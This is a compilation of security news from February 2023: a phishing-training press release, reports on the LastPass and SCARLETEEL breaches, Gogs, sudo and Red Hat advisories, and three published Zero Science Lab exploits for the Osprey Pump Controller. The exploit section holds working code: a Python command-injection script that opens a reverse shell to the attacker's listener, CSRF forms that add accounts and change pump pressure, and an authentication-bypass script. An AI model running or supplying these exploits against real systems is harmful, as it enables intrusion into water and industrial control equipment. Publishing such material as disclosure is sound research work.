Platform uniquely designed to facilitate automated compliance, security behavior change.

**MINNEAPOLIS****,** **Feb. 28, 2023** **/PRNewswire/ --** Hoxhunt, the leading cybersecurity behavior change software company, today announced the availability of the industry's foremost Human Risk Management Platform and three new products. For the first time, cybersecurity leaders can now focus on true visibility and measurable outcomes, not just regulatory and audit compliance.

According to the World Economic Forum, 95 percent of data breaches can be traced back to human error, mostly from clicking on targeted phishing attacks. Hoxhunt delivers high-ROI resilience with minimal resources by automating the transition of employees from being the greatest security risk to the most valuable resource. Hoxhunt's Human Risk Management Platform enables human threat intelligence—which is the only way to catch the millions of sophisticated phishing attacks that evade technical filters each year--into the security stack.

The AI-enabled platform offers three new products that can be aligned with an organization's security maturity state.

*   The new Comply product enables security awareness programs to be delivered automatically. From choosing the curriculum to customizing training content, Hoxhunt Comply enables security leaders to build a comprehensive program at the click of a button.
*   The Hoxhunt Change product adds capabilities to the market leading security behavior change solution. The advanced AI engine and machine learning algorithms transform employees into a global network of threat detection sensors that protect themselves and their organizations from threats that have infiltrated the perimeter. The AI platform delivers individualized, adaptive training experiences for employees at the edge of their skill levels at scale, resulting in lasting and measurable improvement. Even real phishing attacks are transformed into vital learning experiences when employees detect them. The platform assesses and expands individual abilities with quick micro-training nudges based on in-the-moment responses to both real and simulated phishing attacks, which in turn creates long-term engagement and optimal online behavior for employees.
*   Respond helps make sense of the threat feed to the SOC and automatically pinpoints the incidents that need attention. The Hoxhunt platform analyzes over 93,000 newly reported threats every day that have bypassed traditional security technology layers. Now organizations can harness the power of a global network of 1.5M human threat sensors to prevent the most malicious ransomware and BEC attacks.

Hoxhunt was established to take a people-first approach, going beyond traditional, compliance-based security awareness training and enabling a risk-based security strategy via measurable security behavior change.

"As bad actors refine their tactics, searching for gaps in security controls, employees have become the largest attack vector for cybercriminals looking to penetrate into corporate networks," said Mika Aalto, Co-Founder and CEO at Hoxhunt. "Employees are often overlooked as a part of an organization's security posture and attackers continue to exploit this. In most organizations, at best, employees receive generic awareness training in order to meet corporate compliance goals, initiatives which fail to alter employee cyber behavior or create the ability to detect and respond to social engineering attacks. Hoxhunt was established to solve this uncontrolled issue. With our human risk platform, organizations can significantly alter their employees' security skill levels to create a strong human detection engine when attackers surpass technical layers."

Hoxhunt's full-stack, AI-driven platform delivers:

*   **Increased Visibility:** Provides visibility into the true risk of an organization's human layer and the threats that have (or could have) infiltrated their systems.
*   **Measurable Risk Reduction:** Hoxhunt transforms employees into security assets, creating a global human threat sensor network to detect and eliminate email threats that slip past your technical protections. Hoxhunt drives the failure rate to just 2%, compared to 25% when using alternative phishing tools.
*   **Streamlined** **Reporting:** Maintains full control and visibility of employee training progress across departments, automatically generating reports that CISOs can utilize to translate improvements in organizational security posture.

Since its inception, Hoxhunt has helped some of the world's leading companies graduate from security awareness training into security behavior change and human risk management, including Airbus, DocuSign, Kaercher, and Victorinox. The company has also received numerous accolades in recent months. Hoxhunt was named a Best Software Company (EMEA) by G2 and received three awards from TrustRadius for security excellence.

To learn more about Hoxhunt and to request a demo, please visit: https://www.hoxhunt.com/.

**About Hoxhunt**

Hoxhunt helps security leaders and employees join forces to prevent data breaches. Hoxhunt is a Human Risk Management platform that goes beyond security awareness to drive behavior change and measurably lower risk. Data breaches start with people, so Hoxhunt does too. It combines AI and behavioral science to create individualized micro-training experiences people love. Employees learn to detect and report advanced phishing attacks. Operations teams respond fast with limited resources. And security leaders gain outcome-driven metrics to document reduced cybersecurity risk.

Hoxhunt Launches Human Risk Management Platform

The adversaries obtained a decryption key to a LastPass database containing multifactor authentication and federation information as well as customer vault data, company says.

The threat actors who broke into password management firm LastPass's development environment last August used information gathered from that incident for a follow-on attack, the company confirmed. The cyberattackers were able to access and exfiltrate data from an encrypted cloud storage service housing a backup of LastPass customer and vault data.

To pull off the heist, the adversaries targeted a home computer belonging to one of four DevOps engineers at LastPass who had the decryption keys needed to access a broader set of LastPass customer and encrypted vault data housed in encrypted Amazon S3 cloud storage buckets. 

The engineer's machine had a vulnerable third-party media player that the attacker exploited to gain access to the computer and install a keylogger on it. The malware eventually enabled the threat actor to gain access to the DevOps engineer's corporate vault and to export the decryption keys needed to access the AWS S3 LastPass production backups, LastPass said.

**Attacker Had Access to Broad Range of Data**

The DevOps engineer's credentials and keys allowed the threat actor to access a broad range of encrypted and unencrypted data — including password vault data — housed in the AWS S3 storage environment, LastPass announced this week. The backup data included configuration information, API and third-party integration secrets, customer metadata, and backups of all customer vault data. However, LastPass described most of the sensitive data in the customer vaults as encrypted and readable only with a unique decryption key derived from each end user's master passwords. 

"As a reminder, end user master passwords are never known to LastPass and are not stored or maintained by LastPass — therefore, they were not included in the exfiltrated data," the company said.

In addition, the attacker also accessed a backup of a database containing LastPass multifactor authentication (MFA) and federation information. The database included MFA seeds assigned to users when they first registered their MFA authenticator with LastPass, hashes of customer generated one-time passwords (OTPs), and so-called split knowledge components or K2 keys associated with business customers. The secrets that business customers use to integrate third-party MFA vendors such as Duo Security with LastPass were also affected. 

"This database was encrypted, but the separately-stored decryption key was included in the secrets stolen by the threat actor," LastPass said, which has offered up a complete description of all affected data.

**Latest Twist in Unfolding Tale**

The update sent out Feb. 27 is the latest twist in a breach tale that has been slowly growing in scope since last August, when LastPass disclosed that it had spotted unusual activity on its network. At the time, the password management firm said threat actors had broken into its cloud development environment via a compromised software engineer's laptop and stolen some source code and other proprietary technical information. In updates in November and December, LastPass said the same threat actors had used information obtained in the August incident to access and decrypt a limited number of storage volumes within the cloud-based storage service.

LastPass' most recent update is unlikely to win the company any new fans in the security industry, especially because of how the scope of the incident has kept changing with each disclosure. When it first reported the breach last August, company CEO Karim Toubba described it as limited to the company's development environment and claimed the company had "achieved a state of containment." In its subsequent updates, the company reassured users about the separation between its development and production environments and why their information was therefore safe. With this week's announcement, LastPass said the attack on its cloud storage environment had overlapped with the attack on the development environment.

"The company now has a history of breaches and, depending on how you count, this is the third in less than a year," says Eric Noonan, CEO of CyberSheath. At a tactical level, it's hard to know what they might have done better, because information about the breaches have been relatively scant, he says. "In the bigger scheme of things this is what CISA, and other accountable government agencies are talking about when they say product companies have a responsibility to build security and safety into their products prior to unleashing them on the public," Noonan says.

**Review Master Passwords**

The company has advocated that business customers and individual customers review their master passwords and change them if necessary. Users who have followed the company's previous recommendations for setting a master password should be safe from brute-force guessing methods.

The attack is further proof of how inextricably linked enterprise security has become with the security of the networks and devices that employees use at home, security experts say.

CISOs must understand the implications of a personal device compromise, a home network being wide open, or personal compromise impacting the company, says Chris Pierson, CEO and founder of BlackCloak. "The risks are no longer theoretical and never have been," Pierson says. "Because corporate environments have become so well fortified, cybercriminals are moving to the lowest-hanging fruit," which are often are the personal devices of key employees and executives, he says.

A survey that BlackCloak conducted recently found that the personal desktops, mobile, and tablet computing devices that key corporate executives use often are vulnerable and lack basic protections. BlackCloak's data showed, for instance, that 76% of executives' personal devices leak data actively, 87% of executives' personal devices have no security installed on them, and 23% of executives have open ports at home. The survey showed that 87% of executives use passwords that are currently leaked on the Dark Web, 54% do not use a password manager, and social media sites and data brokers have a lot of information that attackers can use to social engineer them.

**Focusing on Home Users & Devices**

Attacks like the one LastPass disclosed this week highlight why security teams need to focus more on protecting employees from account takeover attacks wherever they are and whatever device they might be using, says Avi Turgeman, CEO and co-founder of IronVest. 

"They need to take a more holistic approach to protecting \[employees against\] all critical vulnerabilities," Turgeman tells Dark Reading. This includes implementing measures such as identity authentication, access management, post-login protection, 2FA/MFA protection, and phishing. "Eighty percent of data breaches are a result of compromised credentials," he notes.

LastPass DevOps Engineer Targeted for Cloud Decryption Keys in Latest Breach Revelation

### Impact

The malicious user is able to update a crafted `config` file into repository's `.git` directory in combination with crafted file deletion to gain SSH access to the server on case-insensitive file systems. All installations with [repository upload enabled (default)](https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129) on case-insensitive file systems (Windows, macOS, etc.) are affected.

### Patches

Make sanitization of upload path to `.git` directory to be case-insensitive. Users should upgrade to 0.12.11 or the latest 0.13.0+dev.

### Workarounds

Disable [repository upload](https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129).

### References

https://huntr.dev/bounties/18cf9256-23ab-4098-a769-85f8da130f97/

### For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7030.


**Package**

gomod gogs.io/gogs (Go)

**Affected versions**

< 0.12.11

**Patched versions**

0.12.11

**Description**

**Impact**

The malicious user is able to update a crafted config file into repository's .git directory in combination with crafted file deletion to gain SSH access to the server on case-insensitive file systems. All installations with repository upload enabled (default) on case-insensitive file systems (Windows, macOS, etc.) are affected.

**Patches**

Make sanitization of upload path to .git directory to be case-insensitive. Users should upgrade to 0.12.11 or the latest 0.13.0+dev.

**Workarounds**

Disable repository upload.

**References**

https://huntr.dev/bounties/18cf9256-23ab-4098-a769-85f8da130f97/

**For more information**

If you have any questions or comments about this advisory, please post on gogs/gogs#7030.

**References**

*   GHSA-pfvh-p8qp-9ww9
*   https://nvd.nist.gov/vuln/detail/CVE-2022-2024
*   gogs/gogs#7030
*   gogs/gogs@15d0d6a
*   https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129
*   https://huntr.dev/bounties/18cf9256-23ab-4098-a769-85f8da130f97

 unknwon published to gogs/gogs

Feb 25, 2023

Published by the National Vulnerability Database

Feb 25, 2023

Published to the GitHub Advisory Database

Feb 28, 2023

Reviewed

Feb 28, 2023

Last updated

Feb 28, 2023

GHSA-pfvh-p8qp-9ww9: Gogs OS Command Injection vulnerability

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

The opportunistic "SCARLETEEL" attack on a firm's Amazon Web Services account turns into targeted data theft after the intruder uses an overpermissioned service to jump into cloud system.

A vulnerable Kubernetes container and lax permissions allowed an attacker to turn a opportunistic cryptojacking attack into a wide-ranging intrusion that targeted intellectual property and sensitive data.

The attack, which cloud-security firm Sysdig dubbed "SCARLETEEL," started with a threat actor exploiting a Kubernetes cluster, using an internal service to gain temporary credentials, and then used those credentials to enumerate other Elastic Compute Cloud (EC2) services that had been deployed in the targeted company's infrastructure. In the end, the company — which was not named in the incident report published today — had properly limited the scope of permissions for the stolen identity, which blunted the attack.

The incident, however, underscores that companies need to be careful when configuring the controls that allow cloud resources to interact with each other, says Michael Clark, director of threat research at Sysdig.

"Having EC2 roles being able to access other resources can be common, though usually it is tightly scoped to prevent incidents like this one," he says. "It's more about understanding how misconfigurations like this can combine with other issues leading to a larger breach."

The sophisticated cyberattack also shows that attackers are increasingly targeting cloud infrastructure in better ways. In the past, threat actors have focused on rudimentary interaction with cloud services, such as deploying cryptojacking software, but as they understand the vulnerabilities introduced by businesses in their own environments, cloud-focused attacks are becoming more popular.

In fact, observed cloud exploitation cases nearly doubled in 2022, while the number of incidents where threat actors interacted with cloud resources nearly tripled, cybersecurity services firm CrowdStrike stated in its latest annual "Global Threat Report" published on Feb. 28.

"It took a while for them to figure out how to operate in the cloud," says Adam Meyers, head of intelligence at CrowdStrike. "Organizations really need to be taking a hard look at their cloud security, because the cloud comes secure out of the box, but as people start to operate on it and change it, they make it less secure."

**From Minor to Major Security Breach**

The attacker compromised the target's cloud infrastructure through a vulnerable Internet-exposed service that allowed access to a Kubernetes pod, a technology used to manage and deploy containerized applications. Once inside the cluster, the attacker used the access to deploy containers with cryptojacking software, essentially stealing processing capacity from the victim's cloud infrastructure to mine for cryptocurrency.

"This is a common practice in automated container threats," Sysdig researchers stated in their analysis, adding that the attackers then "exploited that role to do enumeration in the cloud, search for sensitive information, and steal proprietary software."

The attackers had knowledge of how to move through the AWS cloud, including EC2 services, connecting to Lambda serverless functions, and using the continuous integration and continuous deployment (CI/CD) service known as Terraform. Because Terraform often saves the state of its pipeline to Simple Storage Service (S3) buckets, the attacker was able to retrieve those files and find at least one more additional credential in the plaintext data.

The second identity, however, had limited permissions, stopping the attacker's lateral movement, Sysdig stated in its analysis. Meanwhile, the attacker's attempts to enumerate users and cloud infrastructure led to detection, Clark says.

"It was caught by abnormal amounts of AWS actions being taken, especially from roles that shouldn't be making those types of requests," he says. "There is a threat intelligence aspect \[too\] — some of the IP addresses, which were involved, have been associated with malicious activity in the past."

**Misconfiguration, Not Lack of MFA**

The takeaways of the attack? For one, companies need to ensure that they have good visibility into the operation and telemetry of their cloud infrastructure. In addition, limiting access — even assigning read-only access to specific cloud resources — can make all the difference in stopping an attack while in progress. The more attackers hammer at resources using stolen identities, the greater chance of detecting them, according to Sysdig.

"First, zero trust and the principle of least privilege are important and if you implement them, you will reduce the likelihood of compromise," the researchers wrote. "Second, strong detections and alerts should help you catch these activities before an attacker gets too deep."

Clark also points out that multifactor authentication (MFA) technologies will likely not make a great deal of difference in blunting cloud infrastructure attacks, since most of the cloud identities that attackers take advantage of are machine identities — so, alternate protections need to be put into place.

"MFA may have been helpful for the other involved accounts to prevent their access," Clark says, "but these were internal accounts made for automation purposes rather than ones that were expected to be logged into by a person."

Pernicious Permissions: How Kubernetes Cryptomining Became an AWS Cloud Data Heist

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution

Osprey Pump Controller version 1.0.1 suffers from a cross site request forgery vulnerability.

CSRF Add User:--------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="test" />      <input type="hidden" name="sysTextName" value="USERNAME1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="ZSL" />      <input type="submit" value="Add user" />    </form>  </body></html>CSRF Set Password:------------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="pass" />      <input type="hidden" name="sysTextName" value="USERPW1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="t00t" />      <input type="submit" value="Set pass" />    </form>  </body></html>CSRF Set System Pressure Raw:-----------------------------<html>  <body>    <form action="http://TARGET/mbSetRegister_Int.php">      <input type="hidden" name="regValue" value="17301" />      <input type="hidden" name="regAddress" value="40900" />      <input type="hidden" name="minValue" value="0" />      <input type="hidden" name="maxValue" value="32767" />      <input type="hidden" name="backTargetLinkNumber" value="414" />      <input type="hidden" name="userName" value="w00t" />      <input type="submit" value="Modify pressure" />    </form>  </body></html>

Osprey Pump Controller 1.0.1 Cross Site Request Forgery

Osprey Pump Controller version 1.0.1 allows an unauthenticated attacker to create an account and bypass authentication, thereby gaining unauthorized access to the system.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: A vulnerability has been discovered in the web panel of Osprey pump# controller that allows an unauthenticated attacker to create an account# and bypass authentication, thereby gaining unauthorized access to the# system. The vulnerability stems from a lack of proper authentication# checks during the account creation process, which allows an attacker# to create a user account without providing valid credentials. An attacker# who successfully exploits this vulnerability can gain access to the pump# controller's web panel, and cause disruption in operation, modify data,# change other usernames and passwords, or even shut down the controller# entirely.## The attacker can leverage their unauthorized access to the# system to carry out a variety of malicious activities, including:# Modifying pump settings, such as flow rates or pressure levels, causing# damage or loss of control, stealing sensitive data, such as system logs# or customer information, changing passwords and other user credentials,# potentially locking out legitimate users or allowing the attacker to# maintain persistent access to the system, disabling or shutting down# the controller entirely, potentially causing significant disruption to# operations and service delivery.## ----------------------------------------------------------------------# $ ./accpump.py 192.168.0.25 root rewt# [ ok ]# [ ok ]# Login with 'root:rewt' -> Register Access Menu.# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5752# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php### 05.01.2023#import requestsimport sys as sif len(s.argv)!=4:    print("Osprey Pump Controller Bypass Exploit")    print("Arguments: [host] [username] [password]")    exit(-3)else:    url=s.argv[1]    usr=s.argv[2]    pwd=s.argv[3]    if not "http" in url:        url="http://{}".format(url)## Data names .  Values## USERNAME0  .  user# USERNAME1  .# USERNAME2  .# USERNAME3  .# USERNAME4  .# USERPW0    .  1234# USERPW1    .# USERPW2    .# USERPW3    .# USERPW4    .#url+="/"url+="setSystemText"url+=".php"paru={"sysTextValue"        :usr,      "sysTextName"         :"USERNAME3",      "backTargetLinkNumber":75,      "userName"            :"ZSL"}parp={"sysTextValue"        :pwd,      "sysTextName"         :"USERPW3",      "backTargetLinkNumber":75,      "userName"            :"WriteExploit"}r=requests.get(url,params=paru)if 'System String "USERNAME3" set' in r.text:    print("[ ok ]")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")r=requests.get(url,params=parp)if 'System String "USERPW3" set' in r.text:    print("[ ok ]")    print(f"Login with '{usr}:{pwd}' ",end="")    print("-> Register Access Menu.")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")

Osprey Pump Controller 1.0.1 Authentication Bypass

Red Hat Security Advisory 2023-0895-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.29 security update  
Advisory ID:       RHSA-2023:0895-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0895  
Issue date:        2023-02-28  
CVE Names:         CVE-2021-38561 CVE-2022-23521 CVE-2022-41903   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.29 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:1105aa27f627a99a2b3a8b6257a12697b2033a44f1fa2af41491a8e66cd279ac

(For s390x architecture)  
The image digest is  
sha256:65ad21140d0ab515f17eefe4fe12a05cfa5dc7422c09569fd141905f0ca8052e

(For ppc64le architecture)  
The image digest is  
sha256:3fa53f4050d344ece7154e3aa40d2c01ec6b054aead77ace1d2f33651d0ef35d

(For aarch64 architecture)  
The image digest is  
sha256:8f1cac0afb3469f853e8f630c59a476ca77fa1144be761ba24d59ed261a6c425

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
